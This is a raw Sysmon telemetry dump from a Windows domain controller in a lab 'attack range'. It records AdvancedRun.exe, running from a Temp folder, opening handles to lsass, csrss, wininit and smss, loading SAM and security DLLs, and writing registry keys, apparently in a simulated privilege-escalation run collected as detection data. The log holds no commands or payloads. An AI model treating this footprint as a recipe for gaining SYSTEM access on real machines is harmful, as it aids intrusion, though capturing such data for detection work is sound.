10341000x80000000000000004080422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
734700x80000000000000004080418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004080417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.451{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
13241300x80000000000000004080352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.016{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004080351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.014{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
13241300x80000000000000004080344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.009{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004080343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.003{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator
12241200x80000000000000004080341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator
13241300x80000000000000004080340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.822{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004080339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.821{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
13241300x80000000000000004080334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004080333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator
12241200x80000000000000004080331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator
734700x80000000000000004080328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:29.433{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator
13241300x80000000000000004080327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.855{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
13241300x80000000000000004080326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.846{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator
734700x80000000000000004080315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.837{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator
12241200x80000000000000004080299Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
12241200x80000000000000004080298Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator
13241300x80000000000000004080297Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.838{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
734700x80000000000000004080295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004080294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004080293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004080292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004080291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.833{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator
13241300x80000000000000004080290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator
12241200x80000000000000004080289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator
12241200x80000000000000004080288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator
